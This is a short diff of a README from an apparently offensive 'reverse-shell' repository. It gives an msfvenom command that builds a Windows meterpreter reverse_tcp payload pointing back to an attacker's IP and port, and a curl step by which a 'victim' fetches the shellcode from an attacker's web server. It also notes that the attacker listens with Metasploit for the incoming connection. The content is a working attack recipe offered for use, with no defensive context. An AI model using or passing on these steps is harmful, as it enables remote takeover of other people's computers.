bigbadcyborg/reverse-shell/README.md

       $msfvenom -p windows/meterpreter/reverse_tcp lhost={IP of attacker} lport={port #} --format c -o payload-22.c -b "\x00\x0A\x0"

-  To download the shellcode as a victim:
+  To download the shellcode as a victim via web server:

-      $curl bigbadcyborg.com/download.php > payload-22.txt
+      $curl {your http web server}/download.php > payload-22.txt

   Attacker must have Metasploit installed in order to listen for the victim's connection on a port.
       To download the metasploit installer: